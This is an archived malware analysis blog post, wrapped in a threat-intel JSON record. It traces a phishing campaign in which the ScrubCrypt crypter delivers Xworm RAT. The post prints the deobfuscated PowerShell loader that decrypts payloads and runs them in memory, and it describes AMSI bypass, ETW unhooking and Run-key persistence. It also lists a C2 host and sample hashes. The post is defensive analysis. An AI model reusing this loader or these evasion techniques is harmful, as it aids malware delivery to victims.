{
	"id": "ac86d20b-bbe5-40fd-80f7-84cd22062dcb",
	"created_at": "2026-04-06T00:20:03.695365Z",
	"updated_at": "2026-04-10T13:11:41.497736Z",
	"deleted_at": null,
	"sha1_hash": "5978ed4c47afa5909567552d6069b34f0e8679dd",
	"title": "ScrubCrypt - The Rebirth of Jlaive",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 5980812,
	"plain_text": "ScrubCrypt - The Rebirth of Jlaive\r\nBy 0xToxin\r\nPublished: 2023-03-19 · Archived: 2026-04-05 14:24:29 UTC\r\nIntro\r\nIn this blog we are going through a recent phishing campaign that leverages a new crypter sold in underground forums.\r\nOverview\r\nIn the past weeks a new thread was posted in the “Cryptography and Encryption Market” section in hackforums.net promoting a new crypter called “ScrubCrypt”.\r\nThis crypter was found used in a recent phishing campaign which eventually delivered Xworm RAT.\r\nWe will be going through all the analysis steps, from the phishing mail the victim receives to analyzing and deobfuscating the crypter (and its origin) and identifying the final Xworm binary.\r\nThe Phish\r\nThe user received a mail with the subject “LEP/RFQ/AV/04/2022/6030”; the mail itself contains a generic body, letting the user know that there is an attachment that needs to be opened.\r\nhttps://0xtoxin.github.io/threat%20breakdown/ScrubCrypt-Rebirth-Of-Jlaive/\r\nPage 1 of 19\n\nThe mail has an attached archive file (LEPRFQAV04,pdf.001); inside it we can find a .bat file (batch script) that is supposed to be executed by the user and leads to a multistage execution chain.\r\nLEPRFQAV04,pdf.bat\r\nStatic Information\r\nSha256: 04ce543c01a4bace549f6be2d77eb62567c7b65edbbaebc0d00d760425dcd578\r\nVT Detection: 24/61 (Link)\r\nThe script is completely obfuscated.\r\nAt first glance we can notice 2 main things:\r\n1. The script has junk code which utilizes the % symbol in batch scripting.\r\n2. The end of the script contains a huge encrypted blob of data as a comment (::).\r\nBatch Deobfuscation\r\nI start off with removing all the junk code the script contains by using the next script:\r\nimport re\r\n# matches the junk '%<non-word character>%' sequences sprinkled through the batch file\r\nNON_WORD_PATTERN = r'%\\W%'\r\nfile_path = '/Users/igal/malwares/Scrub Crypt/3 - LEPRFQAV04,pdf.bat'\r\nfo = open(file_path, 'r').read()\r\nclean_script = re.sub(NON_WORD_PATTERN, '', fo)\r\nprint(clean_script)\r\n```batch\r\n@echo off\r\npowershell -w hidden -c #\r\nset CUnTR=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\ncopy %CUnTR% \"%~0.exe\" /y \u0026\u0026 cls\r\n\"%~0.exe\" function yA($t){$t.Replace('@', '')}$iwqO=yA 'Get@C@urr@ent@P@roce@ss@';$knsa=yA 'Rea@dAl@lT@e@xt@\r\n::K8fQqk7xvojjb2P9cYvAvVZq2lXoHsKBw6gFb0XhzLyV5n92FTvZL6MK9KFRY8weBiypW/knQPmWgUurEdWUIrgCmzr2gamQnLsxndquXE\r\n```\r\nGreat, now the script is less obfuscated and we can see that there is a powershell script embedded.\r\nI’ve cleaned the script and changed some of the variable names:\r\npowershell -w hidden -c #\r\nset Copy_Ps1_binary=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\ncopy %Copy_Ps1_binary% \"%~0.exe\" /y \u0026\u0026 cls\r\n\"%~0.exe\" function f_remove_@($t){\r\n$t.Replace('@', '')\r\n}\r\n$v_GetCurrentProcess=f_remove_@ 'Get@C@urr@ent@P@roce@ss@';\r\n$v_ReadAllText=f_remove_@ 'Rea@dAl@lT@e@xt@';\r\n$v_EntryPoint=f_remove_@ 'En@t@ry@Poin@t@';\r\n$v_ChangeExtension=f_remove_@ 'Ch@ange@E@xte@nsi@on@';\r\n$v_FromBase64String=f_remove_@ 'From@Bas@e64S@tri@ng@';\r\n$v_Load=f_remove_@ 'Lo@ad@';\r\n$v_TransformFinalBlock=f_remove_@ 'Tr@a@n@sfor@m@F@in@al@B@lo@ck@';\r\n$v_Split=f_remove_@ 'Sp@l@it@';\r\n$v_Invoke=f_remove_@ 'In@vo@ke@';\r\n$v_CreateDecryptor=f_remove_@ 'Cre@at@eD@ec@ry@pto@r@';\r\nfunction f_aes_decrypt($enc_data,$b64_enc_key,$b64_enc_iv){\r\n$v_aescryptor=[System.Security.Cryptography.Aes]::Create();\r\n$v_aescryptor.Mode=[System.Security.Cryptography.CipherMode]::CBC;\r\n$v_aescryptor.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;\r\n$v_aescryptor.Key=[System.Convert]::$v_FromBase64String($b64_enc_key);\r\n$v_aescryptor.IV=[System.Convert]::$v_FromBase64String($b64_enc_iv);\r\n$v_aes_decryptor=$v_aescryptor.$v_CreateDecryptor();\r\n$v_decrypted_data=$v_aes_decryptor.$v_TransformFinalBlock($enc_data,0,$enc_data.Length);\r\n$v_aes_decryptor.Dispose();\r\n$v_aescryptor.Dispose();\r\n$v_decrypted_data; # returns the compressed (gzip) data\r\n}\r\nfunction f_decompress_data($compressed_data){\r\n$v_data_memstream=New-Object System.IO.MemoryStream(,$compressed_data);\r\n$v_decompressed_data=New-Object System.IO.MemoryStream;\r\n$v_gzip_stream=New-Object System.IO.Compression.GZipStream($v_data_memstream,[IO.Compression.CompressionMode]::Decompress);\r\n$v_gzip_stream.CopyTo($v_decompressed_data);\r\n$v_gzip_stream.Dispose();\r\n$v_data_memstream.Dispose();\r\n$v_decompressed_data.Dispose();\r\n$v_decompressed_data.ToArray(); # returns the byte array of the payload\r\n}\r\nfunction f_invoke_payload($payload,$b64_enc_key){\r\n[System.Reflection.Assembly]::$v_Load([byte[]]$payload).$v_EntryPoint.$v_Invoke($null,$b64_enc_key);\r\n}\r\n$batfile_data=[System.IO.File]::$v_ReadAllText([System.IO.Path]::$v_ChangeExtension([System.Diagnostics.Process] # line cut off in the source; it reads the running .bat file back in as an array of lines\r\n$blob_data_chunk=$batfile_data[$batfile_data.Length-1].Substring(2); # takes the last line (the '::' comment) and strips the leading '::'\r\n$blob_data=[string[]]$blob_data_chunk.$v_Split('\\'); # the blob data split by '\\'\r\n$payload2=f_decompress_data (f_aes_decrypt ([Convert]::$v_FromBase64String($blob_data[0])) $blob_data[2] $blob_data[3]);\r\n$payload1=f_decompress_data (f_aes_decrypt ([Convert]::$v_FromBase64String($blob_data[1])) $blob_data[2] $blob_data[3]);\r\nf_invoke_payload $payload1 $null;\r\nf_invoke_payload $payload2 $null;\r\nWhat does the script do?\r\nThe script takes the blob data I’ve mentioned that comes right after the :: comment in the batch script.\r\nIt will split it by backslash and save the split data in a variable ($blob_data_chunk).\r\nThe variable will now be an array with 4 elements:\r\nEncrypted data 1\r\nEncrypted data 2\r\nBase64 encoded AES256 encryption key\r\nBase64 encoded AES256 encryption IV\r\nThe script will pass each encrypted data blob together with the encoded key and IV to the decryption function (f_aes_decrypt); the return value of the function will be a gz archive, which will then be passed to a decompress function (f_decompress_data) that returns the binary in the form of a byte array.\r\nAnd the last thing the script will do is to invoke and execute these binaries.\r\nThe next script can be used to retrieve the archives:\r\nfrom Crypto.Cipher import AES\r\nfrom Crypto.Util.Padding import unpad\r\nfrom base64 import b64decode\r\ndef aes_decrypt(data, key, iv):\r\n    # AES-CBC with PKCS7 padding, matching the PowerShell stub above\r\n    decrypt_cipher = AES.new(key, AES.MODE_CBC, iv)\r\n    return unpad(decrypt_cipher.decrypt(data), AES.block_size)\r\n# clean_script is the junk-free batch script produced by the previous snippet\r\ndata_blob = clean_script.split('::')[-1].split('\\\\')\r\nenc_blob_1 = b64decode(data_blob[0])\r\nenc_blob_2 = b64decode(data_blob[1])\r\nkey = b64decode(data_blob[2])\r\niv = b64decode(data_blob[3])\r\narchive_1 = aes_decrypt(enc_blob_1, key, iv)\r\narchive_2 = aes_decrypt(enc_blob_2, key, iv)\r\nfile_path = '/Users/igal/malwares/Scrub Crypt/archive'\r\nfo = open('{0}{1}.gz'.format(file_path, 1), 'wb').write(archive_1)\r\nfo = open('{0}{1}.gz'.format(file_path, 2), 'wb').write(archive_2)\r\nNow we can go through the binaries and analyze each one of them; based on the script execution flow, the first binary that will be executed is the one stored in archive2.\r\nXsXllt.tmp\r\nStatic Information\r\nSha256: 05eac401aa9355f131d0d116c285d984be5812d83df3a297296d289ce523a2b1\r\nVT Detection: 18/71 (Link)\r\nThe binary is .NET based, as we can inspect using DiE.\r\nI’ve opened the binary in DnSpy and found out it’s obfuscated.\r\nBreaking the deobfuscation\r\nI will now go through the way I’ve managed to deobfuscate the code and make it clear text. First of all, we open up SAE (SimpleAssemblyExplorer) and navigate to the location where the binary is located, right click on the binary and select “Deobfuscator”.\r\nThen we simply click OK and wait for SAE to deobfuscate the code for us.\r\nNow we can open up the binary and find out that it’s a bit clearer than previously.\r\nBut this is not enough; we can see that there is a repetitive method being used by the program, c000001.m000001. We can use De4Dot to deobfuscate the code even more; one thing we need for it is the method token (which can be retrieved by clicking the method and looking at the comment above it).\r\nNow that we have the token we can use the next command to deobfuscate the code: de4dot.exe \u003cSAE_deobfuscated_binary\u003e --strtyp delegate --strtok 06000001\r\nAfter the deobfuscation process has succeeded, a “clean” binary will be created in the binary’s folder; we can open it in DnSpy, see how the magic happened and work with a clear text binary.\r\nEvasion Techniques\r\nThis binary does 2 main operations:\r\nAMSI bypass - The dev isn’t trying to be very creative and copies the rasta-mouse AmsiBypass C# code which can be found on his github repo.\r\nETW unhooking - The dev adds a layer of protection by unhooking EtwEventWrite (Event Tracing for Windows), which will disable the logging for Assembly.Load calls; this topic is explained in depth by XPN.\r\nXPN shares POC code for the unhooking on his github repo.\r\nAfter the execution of this binary, the second binary will be executed, which is stored in Archive1 (the execution of this binary won’t be logged in the event tracer as the unhook in the previous binary occurred).\r\nJuCdip.tmp\r\nStatic Information\r\nSha256: ad13c0c0dfa76575218c52bd2a378ed363a0f0d5ce5b14626ee496ce52248e7a\r\nVT Detection: 23/70 (Link)\r\nThe binary is .NET based, as we can inspect using DiE.\r\nI’ve opened up the binary in DnSpy and found out it’s obfuscated (for the sake of not making this blog too long, I will skip the deobfuscation process of this binary as it’s the same we did with the previous one).\r\nThe clear code:\r\nPersistence \u0026 Execution\r\nNow that we have the clean code, we can go through what the binary actually does. The first thing that I’ve noticed (that eventually led me to finding the ScrubCrypt origin) is the name of the binary: SCRUBCRYPT.\r\nAfter that I started searching for its origin, but this will be explained later.\r\nThe binary does two main things:\r\nPersistence: Once the program is executed it will create a powershell task to delete the binary file from the victim’s computer once the execution of the program is done.\r\nThen the program creates a Mutex (iJOMzLdJpA; if the mutex is already taken it will terminate itself).\r\nThe program will then look up in the registry and in the startup folder whether or not persistence for the binary was already made.\r\nIf the program couldn’t find any persistence related to the binary it will create its own persistence by creating two files in the appdata folder: one file is a .bat file with the content of the initial batch file and the second file is a .vbs file that will execute the .bat file; a registry key will be created under HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run which will execute the .vbs file once the system is rebooted. The mutex will then be released and the program will execute itself again.\r\nExecution: After the program was restarted and confirmed its own persistence it will execute the final payload, which is stored encrypted in the binary resources.\r\nThe encrypted data is simply XOR’ed with a 32 byte long key (in this case: aZAZGrVOlgDxdyHvNzxAcXRlcnuJCRId); after the xor operation the program will decompress the payload out of the XOR’ed archive.\r\nThen the program will load the final payload and invoke its EntryPoint.\r\nI’ve created a small script that will extract the resource from the binary, xor it and save the final payload archive:\r\nimport dnfile\r\nFILEPATH = '/Users/igal/malwares/Scrub Crypt/4 - scrubcrypt binary.bin'\r\nXOR_KEY = 'aZAZGrVOlgDxdyHvNzxAcXRlcnuJCRId'\r\ndef xor_helper(to_xor, key):\r\n    # repeating-key xor: byte i of the data against byte (i mod len(key)) of the key\r\n    key_len = len(key)\r\n    decoded = []\r\n    for i in range(0, len(to_xor)):\r\n        decoded.append(to_xor[i] ^ key[i % key_len])\r\n    return bytes(decoded)\r\npe = dnfile.dnPE(FILEPATH)\r\nfile_path = '/Users/igal/malwares/Scrub Crypt/final_payload'\r\nfor rsrc in pe.net.resources:\r\n    # decode the embedded .NET resource and write out the resulting gzip archive\r\n    rsrc_data = xor_helper(rsrc.data, XOR_KEY.encode())\r\n    fo = open('{0}.gz'.format(file_path), 'wb').write(rsrc_data)\r\nThe Final Payload\r\nThe purpose of the blog is mainly to cover the crypter, but because the final payload being delivered by the crypter is pretty unknown we will cover it in a few sentences.\r\nStatic Information\r\nSha256: 814187405811f7d0e9593ae1ddf0a43ccbd9e8a37bee7688178487eeef3860c6\r\nVT Detection: 41/71 (Link)\r\nOpening the binary in DnSpy we can see that the binary name is XWormClient.\r\nBy quickly analyzing it, the malware is Xworm RAT, which is sold on underground forums for a price tag of $100.\r\nThe malware is created by the EvilCoder Project and their post thread can be found in the Cracked.io forum.\r\nScrubCrypt Origin\r\nNow that we’ve covered the campaign, we can talk about the origin of the crypter.\r\nThe crypter is being sold on Hackforums (as mentioned at the beginning of the blog) for about $40 (for a 1 month sub).\r\nWhen I was investigating ScrubCrypt I suspected that the crypter is a simple copycat of a well known Batchfuscator crypter, Jlaive (Github).\r\nAfter reading some customer comments on the Hackforums post I stumbled upon this comment:\r\nWhich was followed up with an answer from Chash (Jlaive crypter developer):\r\nConclusion\r\nIn this blogpost we went over the execution pattern of the recently rebranded Jlaive crypter, which eventually executes a RAT type malware from the Xworm family.\r\nScrubCrypt was created for marketing reasons and to keep the name of the “Jlaive” crypter alive.\r\nHopefully this blog taught all of you some new tricks :)\r\nIOCs:\r\nSamples:\r\nLEPRFQAV04,pdf.001 - 28d6b3140a1935cd939e8a07266c43c0482e1fea80c65b7a49cf54356dcb58bc\r\nLEPRFQAV04,pdf.bat - 04ce543c01a4bace549f6be2d77eb62567c7b65edbbaebc0d00d760425dcd578\r\namsi \u0026 etw.bin - 05eac401aa9355f131d0d116c285d984be5812d83df3a297296d289ce523a2b1\r\nscrubcrypt binary.bin - ad13c0c0dfa76575218c52bd2a378ed363a0f0d5ce5b14626ee496ce52248e7a\r\nxworm.bin - 814187405811f7d0e9593ae1ddf0a43ccbd9e8a37bee7688178487eeef3860c6\r\nC2:\r\nhurricane.ydns.eu:2311\r\nReferences:\r\nScrubCrypt selling thread\r\nScrubCrypt shop\r\nJlaive Crypter Git\r\nXworm selling thread\r\nXworm shop\r\nXworm cracked version\r\nRastaMouse AMSI POC\r\nXPN ETW blog\r\nXPN ETW POC\r\nSimple assembly explorer\r\nDe4Dot\r\nSource: https://0xtoxin.github.io/threat%20breakdown/ScrubCrypt-Rebirth-Of-Jlaive/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://0xtoxin.github.io/threat%20breakdown/ScrubCrypt-Rebirth-Of-Jlaive/"
	],
	"report_names": [
		"ScrubCrypt-Rebirth-Of-Jlaive"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434803,
	"ts_updated_at": 1775826701,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5978ed4c47afa5909567552d6069b34f0e8679dd.pdf",
		"text": "https://archive.orkl.eu/5978ed4c47afa5909567552d6069b34f0e8679dd.txt",
		"img": "https://archive.orkl.eu/5978ed4c47afa5909567552d6069b34f0e8679dd.jpg"
	}
}